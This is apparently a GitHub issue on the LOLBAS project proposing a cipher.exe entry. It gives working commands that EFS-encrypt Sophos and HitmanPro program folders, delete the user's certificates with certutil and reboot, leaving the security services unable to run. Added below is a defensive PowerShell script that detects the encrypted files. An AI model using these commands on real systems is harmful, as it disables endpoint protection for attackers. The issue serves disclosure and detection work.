LOLBAS

Adding cipher.exe entry

Status: Open. conitrade-as opened this issue 2 years ago • 2 comments

conitrade-as, Jan 09 '23 10:01

Indeed, Microsoft fixed it for Windows Defender (the initial assessment on their end was "valid but does not meet our bar for immediate servicing or it is not exploitable").

Disabling security features such as Windows Defender seems rather unexpected from my point of view. From your guidelines I'd say that:

  • Be a Microsoft-signed file: ✅
  • Have extra "unexpected" functionality -> This executable allows one to modify executables which administrative users should not be allowed to change.
  • Have functionality that would be useful to an APT or red team: ✅

Let me check once more if it still works for other vendors for which we tried this initially.

conitrade-as, Aug 07 '23 13:08

Yes, it still works for other security products with the exact same result: services not running any more. If you want to try it yourself with e.g. Sophos Home, here are a few steps you can use:

```powershell
# Run from an elevated PowerShell prompt (the single-quoted paths are PowerShell
# quoting; under cmd.exe the paths would need double quotes instead).
# cipher.exe /e /s:<dir> EFS-encrypts every file under the directory tree with
# the current user's EFS certificate, including the product's service binaries.
cipher.exe /e /s:'C:\Program Files\Sophos'
cipher.exe /e /s:'C:\Program Files (x86)\Sophos'
cipher.exe /e /s:'C:\Program Files (x86)\HitmanPro.Alert'
# Delete the current user's certificates (the EFS certificate among them) from
# the CurrentUser\My store, so nobody holds the key that can decrypt the files.
# The original post uses cmd syntax (%username%); $env:USERNAME is the
# PowerShell equivalent.
certutil.exe -delstore -user my $env:USERNAME
# Reboot: the services cannot read their now-undecryptable binaries and stay down.
shutdown.exe /r /t 0
```
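An added check, not part of this issue or of the LOLBAS project: a PowerShell script that audits the product directories named in the steps above for EFS-encrypted files (the artefact `cipher.exe /e /s:` leaves behind), asks `cipher.exe /c` who can still decrypt each one, and lists the EFS certificates the current user still holds in `Cert:\CurrentUser\My`. The directory list is copied from the commands above; the function names, the EFS EKU OID lookup and the remediation hint are assumptions for illustration, not anything the issue describes.

```powershell
# Added example (not from the issue or the LOLBAS project). Assumed directory
# list, taken from the steps in the post; adjust for the product you check.
$WatchDirs = @(
    'C:\Program Files\Sophos',
    'C:\Program Files (x86)\Sophos',
    'C:\Program Files (x86)\HitmanPro.Alert'
)

# EKU object identifier that marks an "Encrypting File System" certificate.
$EfsEkuOid = '1.3.6.1.4.1.311.10.3.4'

function Get-EfsEncryptedFiles {
    # Returns one object per file that carries the Encrypted attribute under the
    # given directories, with the raw "cipher.exe /c" output for triage.
    param([string[]]$Paths)
    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        Get-ChildItem -LiteralPath $p -Recurse -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Attributes -band [IO.FileAttributes]::Encrypted } |
            ForEach-Object {
                # cipher.exe /c prints the users (and certificate thumbprints)
                # that can decrypt the file; "Key information cannot be
                # retrieved" here is the sign the key is already gone.
                $info = & cipher.exe /c $_.FullName 2>$null
                [pscustomobject]@{
                    File       = $_.FullName
                    Owner      = (Get-Acl -LiteralPath $_.FullName).Owner
                    CipherInfo = ($info | Where-Object { $_.Trim() }) -join "`n"
                }
            }
    }
}

function Get-CurrentUserEfsCertificates {
    # EFS certificates the current user still has; after the certutil -delstore
    # step in the post this list is expected to be empty.
    Get-ChildItem Cert:\CurrentUser\My |
        Where-Object { $_.EnhancedKeyUsageList.ObjectId -contains $EfsEkuOid } |
        Select-Object Subject, Thumbprint, NotAfter
}

$hits = @(Get-EfsEncryptedFiles -Paths $WatchDirs)
if ($hits.Count -gt 0) {
    "EFS-encrypted files found under protected product directories ($($hits.Count)):"
    $hits | Format-List
} else {
    "No EFS-encrypted files under the watched directories."
}

"EFS certificates held by $env:USERNAME:"
$efsCerts = @(Get-CurrentUserEfsCertificates)
if ($efsCerts.Count -gt 0) { $efsCerts | Format-Table -AutoSize } else { "(none)" }

# Remediation hint (assumption): decryption only works while a certificate that
# can decrypt the files is still available, e.g. before the certutil step.
# foreach ($h in $hits) { cipher.exe /d $h.File }
```

Run it as the user who is suspected of having issued the `cipher.exe` commands: EFS keys are per user, so a second account sees the same Encrypted attribute on the files but a different (typically empty) certificate list.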

conitrade-as, Aug 07 '23 14:08